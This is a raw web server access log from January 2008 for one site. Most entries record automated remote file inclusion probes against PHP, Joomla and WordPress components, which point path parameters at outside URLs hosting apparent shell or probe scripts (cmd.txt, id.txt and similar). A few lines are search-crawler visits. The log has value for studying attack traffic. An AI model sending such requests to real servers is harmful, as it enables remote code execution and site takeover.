72.55.146.215 - - [31/Jan/2008:12:07:57 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://geocities.com/ini_prast/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.246.28 - - [31/Jan/2008:12:08:54 -0800] "GET /logs/access_071230.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.servingweb.com/images/5? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.30.179.208 - - [31/Jan/2008:12:10:30 -0800] "GET /funny/?D=A HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.7.194.105 - - [31/Jan/2008:12:14:27 -0800] "GET /naruto.php?page=http://www.bpec-english.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
66.7.194.105 - - [31/Jan/2008:12:14:27 -0800] "GET /logs/naruto.php?page=http://www.bpec-english.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
85.10.136.201 - - [31/Jan/2008:12:14:58 -0800] "GET /logs/access_071230.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://karavell.com/cmd???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.10.136.201 - - [31/Jan/2008:12:14:59 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://karavell.com/cmd???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.149.167.29 - - [31/Jan/2008:12:15:45 -0800] "GET /logs/access_071225.log//multithumb/multithumb?mosConfig_absolute_path=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.30.216.107 - - [31/Jan/2008:12:15:48 -0800] "GET /logs/access.log HTTP/1.0" 200 300806 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
194.145.150.11 - - [31/Jan/2008:12:18:34 -0800] "GET /logs/access_071225.log//language/lang_english/udj.php?phpbb_root_path=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [31/Jan/2008:12:20:30 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.60.121.56 - - [31/Jan/2008:12:21:04 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://geocities.com/ini_prast/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.139.210 - - [31/Jan/2008:12:21:06 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.139.210 - - [31/Jan/2008:12:21:06 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.139.210 - - [31/Jan/2008:12:21:06 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.139.210 - - [31/Jan/2008:12:21:21 -0800] "GET /logs/access_080117.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.150.12 - - [31/Jan/2008:12:21:28 -0800] "GET /Neos_Chronos/header.php?base_folder=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [31/Jan/2008:12:21:58 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [31/Jan/2008:12:21:58 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [31/Jan/2008:12:21:58 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [31/Jan/2008:12:22:11 -0800] "GET /logs/access_080117.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.143.88 - - [31/Jan/2008:12:23:04 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.143.88 - - [31/Jan/2008:12:23:04 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.143.88 - - [31/Jan/2008:12:23:04 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.143.88 - - [31/Jan/2008:12:23:24 -0800] "GET /logs/access_080117.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.80.93.168 - - [31/Jan/2008:12:23:35 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://autodelen.net//downloads/documenten/documenten.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.80.93.168 - - [31/Jan/2008:12:23:36 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://autodelen.net//downloads/documenten/documenten.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.80.93.168 - - [31/Jan/2008:12:23:36 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://autodelen.net//downloads/documenten/documenten.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.55.146.215 - - [31/Jan/2008:12:23:52 -0800] "GET /logs/access_071230.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://geocities.com/ini_prast/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.146.215 - - [31/Jan/2008:12:23:52 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://geocities.com/ini_prast/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.146.215 - - [31/Jan/2008:12:24:56 -0800] "GET /logs/access_071225.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://geocities.com/ini_prast/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.149.69.97 - - [31/Jan/2008:12:25:46 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://vps.istri.info/~vpsistri/images/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.126 - - [31/Jan/2008:12:26:17 -0800] "GET /presto/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
125.245.27.77 - - [31/Jan/2008:12:27:06 -0800] "GET /logs/access_071228.log/admin.php?include_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
125.245.27.77 - - [31/Jan/2008:12:27:06 -0800] "GET /logs/admin.php?include_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.54.29.114 - - [31/Jan/2008:12:28:01 -0800] "GET /logs/access_071225.log//multithumb/multithumb?mosConfig_absolute_path=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.3.4.126 - - [31/Jan/2008:12:30:10 -0800] "GET /index.php?body=http://www.defendamosmaitencillo.cl/components/config.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.55.146.215 - - [31/Jan/2008:12:30:11 -0800] "GET /logs/access_071230.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.146.215 - - [31/Jan/2008:12:30:11 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.146.215 - - [31/Jan/2008:12:30:11 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.3.4.126 - - [31/Jan/2008:12:30:14 -0800] "GET /logs/index.php?body=http://www.defendamosmaitencillo.cl/components/config.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.3.4.126 - - [31/Jan/2008:12:30:19 -0800] "GET /logs/access_080117.log/index.php?body=http://www.defendamosmaitencillo.cl/components/config.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.3.4.126 - - [31/Jan/2008:12:30:20 -0800] "GET /logs/access_071225.log/index.php?body=http://www.defendamosmaitencillo.cl/components/config.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.55.146.215 - - [31/Jan/2008:12:31:28 -0800] "GET /logs/access_071225.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.53.147.60 - - [31/Jan/2008:12:31:35 -0800] "GET /index.php?pag=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
208.53.147.60 - - [31/Jan/2008:12:31:35 -0800] "GET /logs/index.php?pag=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
208.53.147.60 - - [31/Jan/2008:12:31:35 -0800] "GET /index.php?pag=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
208.53.147.60 - - [31/Jan/2008:12:31:35 -0800] "GET /logs/index.php?pag=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
216.218.159.157 - - [31/Jan/2008:12:33:45 -0800] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
216.218.159.157 - - [31/Jan/2008:12:33:45 -0800] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
89.255.3.70 - - [31/Jan/2008:12:33:49 -0800] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
89.255.3.70 - - [31/Jan/2008:12:33:49 -0800] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
66.11.119.180 - - [31/Jan/2008:12:34:02 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.105.25 - - [31/Jan/2008:12:34:19 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [31/Jan/2008:12:34:20 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.80.93.168 - - [31/Jan/2008:12:34:46 -0800] "GET /logs/access_071230.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://autodelen.net//downloads/documenten/documenten.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.80.93.168 - - [31/Jan/2008:12:34:46 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://autodelen.net//downloads/documenten/documenten.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.80.93.168 - - [31/Jan/2008:12:34:47 -0800] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://autodelen.net//downloads/documenten/documenten.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
58.26.137.64 - - [31/Jan/2008:12:35:46 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [31/Jan/2008:12:35:46 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [31/Jan/2008:12:35:47 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
67.210.96.108 - - [31/Jan/2008:12:35:49 -0800] "GET /index.php?page=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
58.26.137.64 - - [31/Jan/2008:12:35:59 -0800] "GET ///administrator/components/com_chronocontact/excelwriter/PPS/File.php?=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [31/Jan/2008:12:35:59 -0800] "GET /logs///administrator/components/com_chronocontact/excelwriter/PPS/File.php?=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [31/Jan/2008:12:36:01 -0800] "GET /logs/access_080117.log///administrator/components/com_chronocontact/excelwriter/PPS/File.php?=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
209.216.249.194 - - [31/Jan/2008:12:36:33 -0800] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://landleben.bieswang.de/cmd.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
209.216.249.194 - - [31/Jan/2008:12:36:34 -0800] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://landleben.bieswang.de/cmd.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
74.6.22.126 - - [31/Jan/2008:12:36:40 -0800] "GET /funny/ HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.233.14.162 - - [31/Jan/2008:12:36:59 -0800] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.233.14.162 - - [31/Jan/2008:12:37:00 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.233.14.162 - - [31/Jan/2008:12:37:00 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.11.119.180 - - [31/Jan/2008:12:37:35 -0800] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.11.119.180 - - [31/Jan/2008:12:37:35 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.11.119.180 - - [31/Jan/2008:12:37:42 -0800] "GET /logs/access_071228.log//skin/zero_vote/ask_password.php?dir=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.23.53 - - [31/Jan/2008:12:38:54 -0800] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
218.234.23.53 - - [31/Jan/2008:12:38:54 -0800] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
66.80.93.168 - - [31/Jan/2008:12:39:29 -0800] "GET /logs/access_071230.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://autodelen.net//downloads/documenten/documenten.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.11.119.180 - - [31/Jan/2008:12:39:31 -0800] "GET /logs/access_071225.log//skin/zero_vote/ask_password.php?dir=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.11.119.180 - - [31/Jan/2008:12:39:33 -0800] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.65.126.118 - - [31/Jan/2008:12:39:36 -0800] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://wosanbabes.digiit.nl/joomla/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.65.126.118 - - [31/Jan/2008:12:39:36 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://wosanbabes.digiit.nl/joomla/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.65.126.118 - - [31/Jan/2008:12:39:37 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://wosanbabes.digiit.nl/joomla/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.11.119.180 - - [31/Jan/2008:12:40:01 -0800] "GET /logs/access_080101.log//skin/zero_vote/ask_password.php?dir=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.245.27.77 - - [31/Jan/2008:12:40:04 -0800] "GET /logs/access_080106.log/admin.php?include_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.28.43 - - [31/Jan/2008:12:40:12 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.shaunabanks.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
66.212.28.43 - - [31/Jan/2008:12:40:12 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.shaunabanks.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
83.149.69.97 - - [31/Jan/2008:12:40:20 -0800] "GET /logs/access_071230.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://vps.istri.info/~vpsistri/images/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.149.69.97 - - [31/Jan/2008:12:40:20 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://vps.istri.info/~vpsistri/images/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.60.121.56 - - [31/Jan/2008:12:40:41 -0800] "GET /logs/access_071230.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://jorgevolio.com/.cookies/safe.gif???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.60.121.56 - - [31/Jan/2008:12:40:46 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://jorgevolio.com/.cookies/safe.gif???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.60.121.56 - - [31/Jan/2008:12:40:48 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://jorgevolio.com/.cookies/safe.gif???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.11.119.180 - - [31/Jan/2008:12:41:03 -0800] "GET /logs/access_071231.log//skin/zero_vote/ask_password.php?dir=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.11.119.180 - - [31/Jan/2008:12:41:34 -0800] "GET /logs/access_080103.log//skin/zero_vote/ask_password.php?dir=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.10.2 - - [31/Jan/2008:12:41:39 -0800] "GET /logs/access_071225.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://hornydate.co.uk/asc???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.10.2 - - [31/Jan/2008:12:41:40 -0800] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://hornydate.co.uk/asc???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.10.2 - - [31/Jan/2008:12:41:40 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://hornydate.co.uk/asc???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.176.228.30 - - [31/Jan/2008:12:42:54 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.villasapart.co.uk/properties/search/ec? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
81.176.228.30 - - [31/Jan/2008:12:42:54 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.villasapart.co.uk/properties/search/ec? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
72.233.14.162 - - [31/Jan/2008:12:43:04 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.24.212 - - [31/Jan/2008:12:43:58 -0800] "GET /?N=D HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.60.121.56 - - [31/Jan/2008:12:44:09 -0800] "GET /logs/access_071225.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://jorgevolio.com/.cookies/safe.gif???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.11.119.180 - - [31/Jan/2008:12:44:22 -0800] "GET /logs/access_071212.log//skin/zero_vote/ask_password.php?dir=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.11.119.180 - - [31/Jan/2008:12:44:33 -0800] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.11.119.180 - - [31/Jan/2008:12:48:25 -0800] "GET /logs/access_080117.log//skin/zero_vote/ask_password.php?dir=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.202.9.160 - - [31/Jan/2008:12:48:47 -0800] "GET /logs/access_071214.log/skin/zero_vote/ask_password.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.202.9.160 - - [31/Jan/2008:12:48:47 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.202.9.160 - - [31/Jan/2008:12:48:47 -0800] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.119.180 - - [31/Jan/2008:12:49:35 -0800] "GET /logs/access_071230.log//skin/zero_vote/ask_password.php?dir=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.126 - - [31/Jan/2008:12:51:35 -0800] "GET /megumi/?N=D HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.246.41.127 - - [31/Jan/2008:12:51:44 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.11.119.180 - - [31/Jan/2008:12:51:54 -0800] "GET /logs/access_071219.log//skin/zero_vote/ask_password.php?dir=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
